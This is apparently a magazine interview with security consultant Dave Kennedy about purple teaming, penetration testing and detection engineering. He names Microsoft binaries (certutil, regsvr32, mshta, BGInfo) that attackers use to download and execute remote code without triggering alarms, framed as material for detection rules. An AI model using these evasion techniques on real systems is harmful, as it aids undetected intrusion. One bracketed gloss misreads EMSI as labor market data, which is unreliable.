Information Security

Defending the digital infrastructure

Brian Jackson - Fotolia

White hat Dave Kennedy on purple teaming, penetration testing

Russia and other nation-states use application control bypass techniques because they don't "trigger any alarms," the chief hacking officer says.

Dave Kennedy is renowned in the security industry as a co-author of Metasploit: The Penetration Tester's Guide (No Starch Press, July 2011). The bestselling book offers guidance on using the Ruby-based open source "framework" to exploit vulnerabilities in computer systems. The framework is widely used by security testers -- and hackers.

A former CSO, Kennedy led the global security program at Diebold Inc. prior to starting TrustedSec, an information security assessment and consulting firm based in Strongsville, Ohio. He is also the co-founder and chief hacking officer at Binary Defense, a managed endpoint detection and response provider, located in nearby Hudson; the company's technology incorporates the Penetration Testing Execution Standard that he co-founded.

In addition to his work as a white hat hacker, Kennedy is a frequent speaker at industry events and one of the founders of DerbyCon, a security conference in Louisville, Kentucky. Here, he chats with Marcus Ranum -- once a skeptic of penetration testing -- about purple teaming and the latest techniques that hackers use to compromise enterprise environments.

Editor's note: This interview has been edited for length and clarity.

What is purple teaming, and how does it fit into the spectrum of penetration tests?

Dave Kennedy: Penetration testing is still very valid for companies that can ingest it and use it as a way of understanding how attackers are getting into an organization, in order to better strengthen it. Where you start to see the industry shift is that there's a big gap between protection and the time you have to implement it, so detecting gaps becomes a huge focus for an organization. You can say, 'OK, I will accept that Bob in sales' computer got compromised, but I don't want 50 other computers to be compromised before I figure out how the breach occurred.'

 It's about shrinking your window down and understanding the tactics, techniques and procedures of the hackers. And building those detection controls so that, hopefully, you have a better way of detecting an attack in its earlier stage.

Let's take an example of that: Suppose an exploit in a phishing attack gets to Bob in sales; Bob opens a link and he becomes compromised. In that scenario, I just established a command-and-control infrastructure; I can execute commands of some shape or form. I'm probably going to escalate privileges. I'll try to extract cleartext passwords from memory, and move laterally to another system.

Those are all very specific phases of an attack that we can build detection criteria off of and simulate, so we can get better at detection in a lot of different phases. Maybe we can't detect their command-and-control infrastructure because we're not doing SSL termination, but we hit them on the privilege-escalation piece. Maybe we can hit them on the PowerShell commands or the WMI [Windows Management Instrumentation] commands they're using. There are multiple phases we can start to build out in our program in order to get better at it. Who better to do that than the folks who understand adversary emulation or the techniques that hackers use to gain access into the environment?

Instead of it being a penetration test, it's about working with the blue team -- whether that's the security operations center or the firewall team or systems administrators. It's about understanding that we're going to simulate all these different attacks across your environment.

It's not just phishing a domain user -- we don't care about that. We don't care about getting domain administrator rights. We don't care about going after parts of the infrastructure.

Application control bypass techniques are a big thing that is happening right now -- 80% to 85% of compromises still occur from unsigned executables.
Dave Kennedyfounder, TrustedSec, Binary Defense and DerbyCon

It's about simulating those sorts of attacks to learn what you're seeing and not seeing. Maybe we're not seeing something because we don't have a specific log source. Maybe we haven't written a correlation rule that detects an action that shouldn't happen.

It becomes more about the pattern of behavior than about a specific type of attack. For example, application control bypass techniques are a big thing that is happening right now -- 80% to 85% of compromises still occur from unsigned executables. We don't do a good enough job with that.

The second piece is PowerShell -- PowerShell exploitation is a big avenue of attack, too. Because PowerShell has gotten a lot better, attackers are focusing on new exploits against it. PowerShell has scriptblock logging and constrained language mode, and integration into the antimalware scanner for EMSI [labor market data]. It's become a harder attack surface for hackers because it logs everything.

Now you can build great detection off of PowerShell, and that's an avenue that can tip us off about a hacker. What's great about Microsoft is that they have thousands of binaries on the platform, and some of those binaries give us the ability for code execution that doesn't log anything. So there are a whole bunch of binaries from Microsoft that are code-signed, but if you give it certain parameters, it goes and downloads code and executes from the internet. So application control bypass techniques are a very active area, and that's where you see a lot of adversaries like Russia and other nation-states using those methods. It doesn't trigger any alarms.

I am gobsmacked at what horrible design decisions Microsoft makes.

Kennedy: Look at certutil [installed as part of Microsoft's Active Directory Certificate Services]. It imports and exports certificates on the command-line. It has a URLCache option built into it that allows you to download code from the internet and execute it. Regsvr32.exe is a Windows binary, code-signed by Microsoft. It has a built-in web browser that is proxy-aware that allows you to download and execute code from the internet. It never touches the disk; it's loaded directly to memory -- it's completely evasive. Mshta [utility for Microsoft HTML application host] and BGInfo [a utility] are used for displaying your IP address in the background of your screens. BGInfo has remote code-execution capability via VBScript. All of these are methods that hackers are using now.

It's important to know this, because most companies spend millions of dollars building a security operations center [SOC] or a SIEM. They have analysts and alarms, and they're looking for things like brute-forcing user accounts. But the SOC never gets better; it just focuses on what you know from the SIEM. With purple teaming, you're bringing the red team, which is typically the group that understands those techniques, and mapping what they find to the capabilities that are in your environment. You walk out of the exercise with a whole bunch of new rules.

What do you do with the customers who don't fix anything, anyway? Don't you still have the customers who say, 'Oh, thanks a lot for the information!' And then they never do anything?

Dave Kennedy, founder, TrustedSec, Binary Defense, DerbyConDave Kennedy

Kennedy: Purple teaming fixes a lot of the core issues that we had on the pen-testing front. What we'd typically do -- we'd go to a company, we'd rip through their organization, we'd destroy them. And then we'd hand them a report and say, 'Good luck.'

It was a very hostile type environment, because you're basically destroying a company and showing them all of the issues that the team -- that's supposed to fix them -- didn't fix in the first place. 'Hey, we saw you didn't do this right, and you didn't do that right.' People would get very defensive. It causes a lot of hostility between security and IT. [Purple teaming] becomes more of a collaborative approach. It's not pointing out the flaws of IT; it's working together to find out how you can get better.

It does require a maturity level for a company to be at the point where purple teaming works. They need to have the basic stuff covered, like vulnerability management, patch management and good default configuration. Penetration testing is the next evolution from that. You still need penetration testing, because it starts to identify where you have deficiencies in your programs. If I can rip into your organization through seven different web applications, you probably have a problem with your software development lifecycle, and you need to focus on secure coding practices. Pen testing gives you a good understanding about where your exposures are, but it has shifted from being 'Let's go in and get domain admin rights' to 'Let's find as many ways into the organization as possible and focus on gap analysis.'

I used to tell clients: If you can't catch your pen tester, you won't catch a hacker. Orienting your security architecture toward detecting hackers that are 'on your side' seems like an obvious measure, but I think a lot of organizations that do pen tests are just looking for a compliance checkbox.

Kennedy: We do a lot of work for large organizations -- three of the Fortune 5 -- and they have a higher level of maturity. What I can say is that it is exponentially harder for us, as attackers, to get into companies that do purple teaming. It has gotten to the point with some of our customers where it's so difficult to get in that I had to create a research division at TrustedSec that just focuses on developing new techniques.

Now we've just got to get everyone to do the hard part -- get into the trenches and manage their networks carefully with an active-defense model.

Article 6 of 6

Next Steps

Inside the PEIR purple teaming model

Dig Deeper on Risk management

Get More Information Security

Access to all of our back issues View All
Networking
CIO
Enterprise Desktop
Cloud Computing
ComputerWeekly.com
Close